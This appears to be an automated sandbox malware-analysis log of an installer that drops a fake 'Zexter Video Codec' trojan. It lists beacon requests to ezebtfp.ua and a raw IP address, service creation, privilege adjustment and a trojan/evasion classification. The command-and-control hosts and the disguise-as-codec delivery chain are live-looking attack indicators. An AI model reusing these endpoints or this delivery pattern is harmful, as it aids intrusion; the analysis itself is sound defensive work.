        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1Host: ezebtfp.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1Host: ezebtfp.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1Host: ezebtfp.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1Host: ezebtfp.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1Host: ezebtfp.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1Host: ezebtfp.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1Host: ezebtfp.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1Host: ezebtfp.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1Host: ezebtfp.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1Host: ezebtfp.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1Host: ezebtfp.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1Host: ezebtfp.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1Host: ezebtfp.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1Host: ezebtfp.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1Host: ezebtfp.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1Host: ezebtfp.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global traffic | DNS traffic detected: DNS query: ezebtfp.ua
        Source: global traffic | DNS traffic detected: DNS query: signup.live.com
        Source: zextervideocodec32_64.exe, 00000003.00000002.3289384542.00000000035BB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.2
        Source: zextervideocodec32_64.exe, 00000003.00000002.3288010011.00000000007CE000.00000004.00000020.00020000.00000000.sdmp, zextervideocodec32_64.exe, 00000003.00000002.3289222096.0000000003509000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.208.158.248/search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c8
        Source: zextervideocodec32_64.exe, 00000003.00000002.3288010011.0000000000881000.00000004.00000020.00020000.00000000.sdmp, zextervideocodec32_64.exe, 00000003.00000002.3289222096.00000000034F0000.00000004.00000020.00020000.00000000.sdmp, zextervideocodec32_64.exe, 00000003.00000002.3288010011.00000000008BA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.208.158.248/search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82d
        Source: zextervideocodec32_64.exe, 00000003.00000002.3289384542.00000000035BB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.258.2
        Source: is-FGQU3.tmp.1.dr | String found in binary or memory: http://WWW-Authenticate:Proxy-Authenticate:Content-Encoding:gzip1.2.8Content-Length:-/recv
        Source: is-TNU6F.tmp.1.dr | String found in binary or memory: http://freedesktop.org
        Source: is-TNU6F.tmp.1.dr | String found in binary or memory: http://freedesktop.orgtypenameexeccounttimestampparse_data-
        Source: L9rm7AX4mp.exe, 00000000.00000002.3287835540.00000000021B8000.00000004.00001000.00020000.00000000.sdmp, L9rm7AX4mp.exe, 00000000.00000003.2036923371.00000000023E0000.00000004.00001000.00020000.00000000.sdmp, L9rm7AX4mp.tmp, 00000001.00000003.2039536568.0000000002090000.00000004.00001000.00020000.00000000.sdmp, L9rm7AX4mp.tmp, 00000001.00000003.2039453112.00000000031A0000.00000004.00001000.00020000.00000000.sdmp, L9rm7AX4mp.tmp, 00000001.00000002.3288142332.0000000002084000.00000004.00001000.00020000.00000000.sdmp, L9rm7AX4mp.tmp, 00000001.00000002.3287918641.000000000085B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://fsf.org/
        Source: is-9G1LK.tmp.1.dr | String found in binary or memory: http://gcc.gnu.org/bugs.html):
        Source: is-61SBR.tmp.1.dr | String found in binary or memory: http://mingw-w64.sourceforge.net/X
        Source: is-FGQU3.tmp.1.dr | String found in binary or memory: http://purl.oclc.org/dsdl/schematron
        Source: is-FGQU3.tmp.1.dr | String found in binary or memory: http://purl.oclc.org/dsdl/schematronpathhttp://www.ascc.net/xml/schematron:node
        Source: is-FGQU3.tmp.1.dr | String found in binary or memory: http://relaxng.org/ns/structure/1.0
        Source: is-FGQU3.tmp.1.dr | String found in binary or memory: http://relaxng.org/ns/structure/1.0definenameincludegrammarxmlRelaxNGParse:
        Source: is-4BT74.tmp.1.dr | String found in binary or memory: http://tukaani.org/
        Source: is-4BT74.tmp.1.dr | String found in binary or memory: http://tukaani.org/xz/
        Source: is-FGQU3.tmp.1.dr | String found in binary or memory: http://www.ascc.net/xml/schematron
        Source: is-2DT7G.tmp.1.dr | String found in binary or memory: http://www.freedesktop.org/standards/dbus/1.0/introspect.dtd
        Source: is-TNU6F.tmp.1.dr | String found in binary or memory: http://www.freedesktop.org/standards/desktop-bookmarks
        Source: is-TNU6F.tmp.1.dr | String found in binary or memory: http://www.freedesktop.org/standards/desktop-bookmarksapplicationgroupapplicationsgroupsprivateiconh
        Source: is-TNU6F.tmp.1.dr | String found in binary or memory: http://www.freedesktop.org/standards/shared-mime-info
        Source: L9rm7AX4mp.exe, 00000000.00000002.3287835540.00000000021B8000.00000004.00001000.00020000.00000000.sdmp, L9rm7AX4mp.exe, 00000000.00000003.2036923371.00000000023E0000.00000004.00001000.00020000.00000000.sdmp, L9rm7AX4mp.tmp, 00000001.00000003.2039536568.0000000002090000.00000004.00001000.00020000.00000000.sdmp, L9rm7AX4mp.tmp, 00000001.00000003.2039453112.00000000031A0000.00000004.00001000.00020000.00000000.sdmp, L9rm7AX4mp.tmp, 00000001.00000002.3288142332.0000000002084000.00000004.00001000.00020000.00000000.sdmp, L9rm7AX4mp.tmp, 00000001.00000002.3287918641.000000000085B000.00000004.00000020.00020000.00000000.sdmp, is-K2QCH.tmp.1.dr, is-LP383.tmp.1.dr | String found in binary or memory: http://www.gnu.org/licenses/
        Source: L9rm7AX4mp.tmp, L9rm7AX4mp.tmp, 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-1611L.tmp.1.dr, L9rm7AX4mp.tmp.0.dr | String found in binary or memory: http://www.innosetup.com/
        Source: is-FGQU3.tmp.1.dr | String found in binary or memory: http://www.oasis-open.org/committees/entity/release/1.0/catalog.dtd
        Source: is-FGQU3.tmp.1.dr | String found in binary or memory: http://www.oasis-open.org/committees/entity/release/1.0/catalog.dtd-//OASIS//DTD
        Source: L9rm7AX4mp.exe, 00000000.00000003.2037781035.00000000021C4000.00000004.00001000.00020000.00000000.sdmp, L9rm7AX4mp.exe, 00000000.00000003.2037603002.00000000023E0000.00000004.00001000.00020000.00000000.sdmp, L9rm7AX4mp.tmp, L9rm7AX4mp.tmp, 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-1611L.tmp.1.dr, L9rm7AX4mp.tmp.0.dr | String found in binary or memory: http://www.remobjects.com/ps
        Source: L9rm7AX4mp.exe, 00000000.00000003.2037781035.00000000021C4000.00000004.00001000.00020000.00000000.sdmp, L9rm7AX4mp.exe, 00000000.00000003.2037603002.00000000023E0000.00000004.00001000.00020000.00000000.sdmp, L9rm7AX4mp.tmp, 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-1611L.tmp.1.dr, L9rm7AX4mp.tmp.0.dr | String found in binary or memory: http://www.remobjects.com/psU

        System Summary

        Source: zextervideocodec32_64.exe.1.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        Source: EMAIL Safe Storage 10.2.46.exe.3.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | Code function: 1_2_0042F530 NtdllDefWindowProc_A
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | Code function: 1_2_00423B94 NtdllDefWindowProc_A
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | Code function: 1_2_004125E8 NtdllDefWindowProc_A
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | Code function: 1_2_004789DC NtdllDefWindowProc_A
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | Code function: 1_2_004573CC PostMessageA,PostMessageA,SetForegroundWindow,NtdllDefWindowProc_A
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | Code function: 1_2_0042E944: CreateFileA,DeviceIoControl,GetLastError,CloseHandle,SetLastError
        Source: C:\Users\user\Desktop\L9rm7AX4mp.exe | Code function: 0_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | Code function: 1_2_004555D0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx
        Source: C:\Users\user\Desktop\L9rm7AX4mp.exe | Code function: 0_2_0040840C
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | Code function: 1_2_004804C6
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | Code function: 1_2_00470950
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | Code function: 1_2_004352D8
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | Code function: 1_2_00467710
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | Code function: 1_2_0043036C
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | Code function: 1_2_004444D8
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | Code function: 1_2_004345D4
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | Code function: 1_2_00486604
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | Code function: 1_2_00444A80
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | Code function: 1_2_00430EF8
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | Code function: 1_2_00445178
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | Code function: 1_2_0045F430
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | Code function: 1_2_0045B4D8
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | Code function: 1_2_00487564
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | Code function: 1_2_00445584
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | Code function: 1_2_00469770
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | Code function: 1_2_0048D8C4
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | Code function: 1_2_004519A8
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | Code function: 1_2_0043DD60
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | Code function: 1_2_02381260
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | Code function: 1_2_02381D20
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe | Code function: 3_2_00406C47
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe | Code function: 3_2_00401051
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe | Code function: 3_2_00401C26
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe | Code function: 3_2_02BFC2AD
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe | Code function: 3_2_02BFB4E5
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe | Code function: 3_2_02BDE22D
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe | Code function: 3_2_02BCF050
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe | Code function: 3_2_02BE4EC9
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe | Code function: 3_2_02BE2E54
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe | Code function: 3_2_02BDE645
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe | Code function: 3_2_02BD9F24
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe | Code function: 3_2_02BD84E2
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe | Code function: 3_2_02BDACDA
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe | Code function: 3_2_02BE5440
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe | Code function: 3_2_02BDDD39
        Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\is-2SCAO.tmp\_isetup\_RegDLL.tmp 4DC09BAC0613590F1FAC8771D18AF5BE25A1E1CB8FDBF4031AA364F3057E74A2
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe | Code function: String function: 02BE53D0 appears 138 times
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe | Code function: String function: 02BD8B80 appears 37 times
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | Code function: String function: 00405964 appears 116 times
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | Code function: String function: 00408C14 appears 45 times
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | Code function: String function: 00406ACC appears 41 times
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | Code function: String function: 00403400 appears 61 times
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | Code function: String function: 00445DE4 appears 45 times
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | Code function: String function: 004078FC appears 43 times
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | Code function: String function: 004344EC appears 32 times
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | Code function: String function: 00403494 appears 82 times
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | Code function: String function: 00457D58 appears 73 times
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | Code function: String function: 00453330 appears 93 times
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | Code function: String function: 00457B4C appears 98 times
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | Code function: String function: 00403684 appears 221 times
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | Code function: String function: 004460B4 appears 59 times
        Source: L9rm7AX4mp.exe | Static PE information: Resource name: RT_VERSION type: COM executable for DOS
        Source: L9rm7AX4mp.tmp.0.dr | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
        Source: L9rm7AX4mp.tmp.0.dr | Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
        Source: L9rm7AX4mp.tmp.0.dr | Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
        Source: L9rm7AX4mp.tmp.0.dr | Static PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
        Source: is-1611L.tmp.1.dr | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
        Source: is-1611L.tmp.1.dr | Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
        Source: is-1611L.tmp.1.dr | Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
        Source: is-1611L.tmp.1.dr | Static PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
        Source: is-61SBR.tmp.1.dr | Static PE information: Number of sections : 11 > 10
        Source: is-6S03E.tmp.1.dr | Static PE information: Number of sections : 11 > 10
        Source: is-JTN8Q.tmp.1.dr | Static PE information: Number of sections : 11 > 10
        Source: is-2TIQ1.tmp.1.dr | Static PE information: Number of sections : 11 > 10
        Source: is-MJPNF.tmp.1.dr | Static PE information: Number of sections : 11 > 10
        Source: is-TNU6F.tmp.1.dr | Static PE information: Number of sections : 11 > 10
        Source: is-MVKEA.tmp.1.dr | Static PE information: Number of sections : 11 > 10
        Source: is-O9QDL.tmp.1.dr | Static PE information: Number of sections : 11 > 10
        Source: is-4BT74.tmp.1.dr | Static PE information: Number of sections : 11 > 10
        Source: is-H2J0H.tmp.1.dr | Static PE information: Number of sections : 11 > 10
        Source: is-OMDJC.tmp.1.dr | Static PE information: Number of sections : 11 > 10
        Source: is-2DT7G.tmp.1.dr | Static PE information: Number of sections : 11 > 10
        Source: is-ILE5I.tmp.1.dr | Static PE information: Number of sections : 11 > 10
        Source: is-6DO3I.tmp.1.dr | Static PE information: Number of sections : 11 > 10
        Source: L9rm7AX4mp.exe, 00000000.00000003.2037781035.00000000021C4000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameshfolder.dll~/ vs L9rm7AX4mp.exe
        Source: L9rm7AX4mp.exe, 00000000.00000003.2037603002.00000000023E0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameshfolder.dll~/ vs L9rm7AX4mp.exe
        Source: L9rm7AX4mp.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
        Source: _RegDLL.tmp.1.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: classification engine | Classification label: mal100.troj.evad.winEXE@5/154@3/2
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe | Code function: 3_2_02BD08A0 _memset,FormatMessageA,GetLastError,FormatMessageA,GetLastError
        Source: C:\Users\user\Desktop\L9rm7AX4mp.exe | Code function: 0_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | Code function: 1_2_004555D0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | Code function: 1_2_00455DF8 GetModuleHandleA,GetProcAddress,GetDiskFreeSpaceA
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe | Code function: CreateServiceA,CloseServiceHandle,CloseServiceHandle | 3_2_0040D3E8
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | Code function: 1_2_0046E38C GetVersion,CoCreateInstance
        Source: C:\Users\user\Desktop\L9rm7AX4mp.exe | Code function: 0_2_00409BEC FindResourceA,SizeofResource,LoadResource,LockResource
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe | Code function: 3_2_00402199 lstrcmpiW,StartServiceCtrlDispatcherA,lstrcmpiW
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe | Code function: 3_2_0040D487 StartServiceCtrlDispatcherA
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe | Code function: 3_2_00402170 StartServiceCtrlDispatcherA
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | File created: C:\Users\user\AppData\Local\Zexter Video Codec
        Source: C:\Users\user\Desktop\L9rm7AX4mp.exe | File created: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | File read: C:\Windows\win.ini
        Source: C:\Users\user\Desktop\L9rm7AX4mp.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe | File read: C:\Windows\System32\drivers\etc\hosts
        Source: L9rm7AX4mp.exe | ReversingLabs: Detection: 23%
        Source: C:\Users\user\Desktop\L9rm7AX4mp.exe | File read: C:\Users\user\Desktop\L9rm7AX4mp.exe
        Source: unknown | Process created: C:\Users\user\Desktop\L9rm7AX4mp.exe "C:\Users\user\Desktop\L9rm7AX4mp.exe"
        Source: C:\Users\user\Desktop\L9rm7AX4mp.exe | Process created: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp "C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp" /SL5="$20420,8045603,54272,C:\Users\user\Desktop\L9rm7AX4mp.exe"
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | Process created: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe "C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe" -i
        Source: C:\Users\user\Desktop\L9rm7AX4mp.exe | Section loaded: apphelp.dll
        Source: C:\Users\user\Desktop\L9rm7AX4mp.exe | Section loaded: uxtheme.dll
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | Section loaded: apphelp.dll
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | Section loaded: mpr.dll
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | Section loaded: version.dll
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | Section loaded: uxtheme.dll
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | Section loaded: kernel.appcore.dll
